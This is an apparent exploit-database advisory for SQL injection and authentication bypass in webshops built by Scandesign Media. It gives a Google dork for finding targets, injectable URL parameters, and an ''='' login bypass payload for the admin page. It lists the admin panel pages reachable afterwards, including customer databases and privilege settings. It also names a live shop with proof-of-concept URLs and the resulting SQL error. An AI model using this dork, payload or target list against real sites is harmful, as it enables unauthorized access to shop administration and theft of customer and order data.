Scandesign Media AS Denmark SQL Inj Auth Bypass Vulnerability

2018.09.12

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:''Scandesign Media A/S'' site:dk

#################################################################################################
# Exploit Title : Scandesign Media AS Denmark SQL Inj Auth Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 12/09/2018
# Vendor Homepage : scandesignmedia.dk
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-592 - [ Authentication Bypass Issues ]
#################################################################################################
# Google Dork : intext:''Scandesign Media A/S'' site:dk
# SQL Injection Exploit :
/categori.php?show=long&sort=newest&count=[ID-NUMBER]&categori=[SQL Injection]
/categori.php?show=long&sort=newest&count=[ID-NUMBER]&categori=[ID-NUMBER]&type=normal&tc=[ID-NUMBER]&page=[ID-NUMBER]&tc=[SQL Injection]
# Admin Login : /admin/login.php
Username : '=''or'
Password : '=''or'
# Useable Admin Control Panel URL Links =>
/admin/user/edit_user.php
/admin/categori_items/cat.php
/admin/categori_items/reference.php
/admin/categori_items/index_userdefined.php
/admin/categori_items/add_userdefined.php
/admin/campaign/campaign.php
/admin/order/confirmorder.php
/admin/order/faktura.php
/admin/databases/customer.php
/admin/user/edit_priviligies.php
/admin/configuration/config.php
/admin/custompage/custompage.php
/admin/freight_paymethod/freight.php
/admin/freight_paymethod/paymethod.php
#################################################################################################
# Example Site =>
cobioshop.dk/categori.php?show=long&sort=newest&count=20&categori=15%27 => [ Proof of Concept ] => archive.is/GOpwQ
cobioshop.dk/categori.php?show=long&sort=newest&count=20&categori=15&type=normal&tc=1&page=3&tc=1%27
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 1
on line: 10
SELECT item_id FROM webshop_tbl_item WHERE _catid = '15'' AND item_deleted = '0'
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################

References:

https://www.cyberizm.org/cyberizm-scandesignmedia-denmark-sql-inj-auth-bypass-vuln.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Scandesign Media AS Denmark SQL Inj Auth Bypass Vulnerability

Dork: intext:''Scandesign Media A/S'' site:dk

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.